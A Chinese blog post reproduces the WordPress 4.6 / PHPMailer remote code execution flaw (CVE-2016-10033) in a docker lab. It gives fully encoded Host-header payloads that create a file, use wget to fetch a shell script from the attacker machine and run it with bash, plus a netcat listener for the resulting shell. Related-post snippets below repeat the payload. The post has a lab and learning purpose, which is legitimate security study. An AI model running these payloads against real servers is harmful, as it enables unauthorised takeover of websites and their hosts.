WordPress 4.6远程执行代码漏洞

最新推荐文章于 2024-10-11 19:18:21 发布
最新推荐文章于 2024-10-11 19:18:21 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45473613/article/details/108962034
版权

WordPress 4.6远程执行代码漏洞(漏洞复现)

漏洞编码:

CVE-2016-10033

漏洞简述:

WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。远程攻击者可以利用该漏洞执行代码。

漏洞版本:

WordPress <= 4.6.0
PHPMailer < 5.2.18

漏洞原理:

主要是phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。

环境搭建:

攻击机IP:192.168.35.128
靶机IP: 192.168.35.143

靶机启动环境

docker-compose build
docker-compose up -d

在这里插入图片描述
进入页面 http://192.168.35.143:8080/wp-login.php

在这里插入图片描述
在找回密码的页面进行抓包

在这里插入图片描述

我们需要满足以下要求才能利用此漏洞
  1. 执行的命令不能包含一些特殊的字符,例如:,’,"等。
  2. 该命令将转换为小写字母
  3. 该命令需要使用绝对路径
  4. 需要知道一个现有的用户名

构造payload进行测试

主要是利用对空格和“/”进行以下转换

空格 ==> {substr{10}{1}{tod_log}}
/ ==> {substr{0}{1}{spool_directory}}

初始构造的payload(该payload的作用是在/tmp/下创建success的文件夹)

target(any -froot@localhost -be ${run{/bin/touch /tmp/success}} null)

转换之后的payload

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

修改抓包中的Host:构造的payload,

在这里插入图片描述
去靶机环境查看,确实创建了success的文件。
在这里插入图片描述

因此可以利用curl和wget远程下载文件,然后执行getshell

构造payload进行远程文件下载

构造初始的payload

target(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/rce 192.168.35.128/shell.txt}} null)

转换之后的payload

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}192.168.35.128${substr{0}{1}{$spool_directory}}shell.txt}} null)

在靶机环境查看,已经远程下载了rce的文件。
在这里插入图片描述

上传shell之后,只需执行即可

构造执行shell.txt的payload

target(any -froot@localhost -be ${run{/bin/bash /tmp/rce}} null)

转换之后为


target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)

同时在kali开启监听

nc -vlp 4444

发送执行命令的payload

在这里插入图片描述

发现kali已经连接webshell

在这里插入图片描述

漏洞修复:

更新wordpress,phpmailer到最新的版本。

ps:一人一个屁~~~

参考链接

https://vulhub.org/#/environments/wordpress/pwnscriptum/

https://github.com/opsxcq/exploit-CVE-2016-10033

https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

2火gENg
关注
Wordpress 4.6 任意命令执行漏洞
玄道的网安博客
06-12 4893
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4808
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行漏洞版本: WordPress &lt;= 4.6.0 PH...
php wordpress漏洞,wordpress 4.6远程代码执行漏洞环境搭建
weixin_39942033的博客
03-25 337
这篇文章主要是记录下搭建漏洞测试环境的过程,然而从中午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。docker pull wordpress:4.6-php5.6-apachedocker pull daocloud.io/library/mysql:5...
Goby 漏洞发布|CVE-2024-8353:WordPress GiveWP 插件 /admin-ajax.php 命令执行漏洞
最新发布
m0_46699477的博客
10-11 368
GiveWP 是一个非常受欢迎的 WordPress 插件,专门用于非营利组织和个人接受在线捐款。 WordPress中的GiveWP捐款插件和募款平台插件存在PHP对象注入漏洞,影响所有版本至包括(含)3.16.1版本。该漏洞通过反序列化不可信输入的几个参数(如'give_title'和'card_address')产生。这使得未经身份验证的攻击者可以注入PHP对象
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞
qq_45300786的博客
04-16 1126
访问地址:http://your-ip:8080/wp-login.php 这里我就简单说下需要特别注意的地方。 1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替 2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替 Payload,在tmp处添加success文件 aa(any -froot@localhost -be ${run{/bin/touch /tmp/success
php wordpress漏洞,WordPress 4.6无需认证远程命令执行漏洞分析
weixin_31069599的博客
03-25 842
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。根据w3techs.com对WordPress网站的实时市场份额统计,WordPress占所有使用内容管理系统的网站的58.9%。大约占所有网站的27.9%左右。WordPress 4.6 版本存在一个非常严重的远程代码执行漏洞,未经授权的攻...
Wordpress 4.6 任意命令执行漏洞(PwnScriptum)
EC_Carrot的博客
08-21 505
漏洞详细 详细务必请看:https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md 漏洞复现 发送如下数据包,可见/tmp/success已经成功创建: POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}b
WordPress远程命令执行
harker_20的博客
11-15 1100
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.csdn.net/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...
WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验
Hvnt3r的博客
05-28 1321
WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验 0x00 此漏洞利用的是HTTP头部注入,参考资料:http://www.freebuf.com/articles/web/164817.html 首先祭出实验来源:http://vulapps.evalbug.com/w_wordpress_6/ 实验环境需要docker来...
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 640
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
命令执行漏洞和CVE-2016-5734分析
willow_liang的博客
10-17 909
命令执行漏洞 背景 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。 命令执行漏洞原理 命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
永远是少年
12-31 1670
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞(PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
WordPress-Mailpress远程代码执行漏洞
冷冷的oO
02-16 3353
在kali中使用火狐浏览器打开靶场192.168.7.200,看到题目。 访问题目给出的网址192.168.7.100。 在终端中使用WPScan扫描网址: 输入命令wpscan --url IP 然后扫描结果中显示Interesting Findings,仔细观察。 在这里我们主要对mailpress rce漏洞进行复现,找到flag。 步骤: 1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件. 2.调出插件,输入URL和要提交的数据
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3738
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
Wordpress主题编辑器漏洞复现
墨鱼菜鸡
11-28 309
Wordpress是全球流行的博客网站,全球有上百万人使用它来搭建博客。他使用PHP脚本和Mysql数据库来搭建网站。 那么,如果当我们在渗透测试过程中获得到了别人Wordpress的账号和密码之后,如何才能拿到该服务器的shell呢? 我们可以利用Wordpress主题编辑的功能,在主题的页面中插入我...
wordpress php执行代码_针对WordPress的攻击调查
weixin_39930252的博客
12-12 162
WordPress是一个著名的开源内容管理系统(CMS),用于创建网站和个人博客,据估计,目前35%的网站都在使用CMS。针对CMS平台的攻击时有发生,本文分析了针对WordPress的不同类型的攻击,以及管理访问、API、Shell部署和SEO等攻击特点。通过黑客管理访问攻击WordPress站点此方法可获得WordPress网站的管理员访问权限。攻击者可以利用漏洞或泄露的凭据进行攻击...
Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码 用于ssh登录提权
YouthBelief的博客
12-29 2482
0x00 环境搭建 下载地址 https://download.vulnhub.com/hackfest2016/Quaoar.ova 运行环境 Virtual Box 仅主机网络 kali 搭建同网卡 目标 root权限 flag文件 0x01 信息收集 靶机ip探测 nmap -sP 192.168.56.0/24 192.168.56.109 端口服务探测识别 nmap -sC -sV -A -p- 192.168.56.109 -o port.txt 22/tcp
wordpress plugin 代码注入漏洞
05-01
wordpress plugin 代码注入漏洞是指恶意攻击者可以利用互联网中存在的溢出漏洞和路径遍历漏洞,向特定的wordpress插件中注入恶意代码,从而导致网站遭受攻击或者被黑客攻破。 一旦攻击者成功注入恶意代码,就可以窃取网站的敏感信息、修改网站源码、破坏网站内容等等恶意行为。此外,攻击者还可以利用wordpress插件中的安全漏洞,实施远程代码执行,导致网站信息泄露或者被攻击控制。 为避免wordpress插件代码注入漏洞,网站管理员应该及时更新wordpress版本和插件,避免使用来路不明的插件,关闭不必要的功能模块,对上传文件限制类型和大小等措施。同时,需要加强密码管理,禁止使用弱密码等不安全措施,以此保险起见,谢谢。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值